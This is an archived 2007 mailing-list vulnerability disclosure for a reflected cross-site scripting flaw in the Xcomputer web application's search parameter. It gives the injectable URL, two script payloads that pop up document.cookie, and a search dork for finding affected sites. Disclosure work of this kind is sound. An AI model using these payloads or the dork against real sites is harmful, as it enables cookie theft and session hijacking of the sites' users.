Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

HTML Injection Vuln in nssboard

Stringbeans (Portal) - Lang Parameter Cross-Site Scripting Vulnerability

InnovaShop™® (mgs.jps) Cross Siting Scripting

From:	Jose Luis Góngora Fernández <sys-project_(at)_hotmail.com>
Date:	16.10.2007
Subject:	Xcomputer - Lang Parameter Cross-Site Scripting Vulnerability

# Xcomputer - Lang Parameter Cross-Site Scripting Vulnerability
# Download:
# http://www.xcomputer.cz/
# Bug found by JosS / Jose Luis Góngora Fernández
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
# /server irc.freenode.net /join #fullsecure
# d0rk: "power by xcomputer.cz"
# Stop lammer

# Exploit In (XSS):

http://www.example.com/Search.asp?EXPS=[XSS]
....

# Cross Siting Scripting (Code):

"><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>

//---------------------------------------\\

Greetz To: All Hackers
JosS! / Jose Luis Góngora Fernández

_________________________________________________________________
Descubre la descarga digital con MSN Music. Más de un millón de canciones.
http://music.msn.es/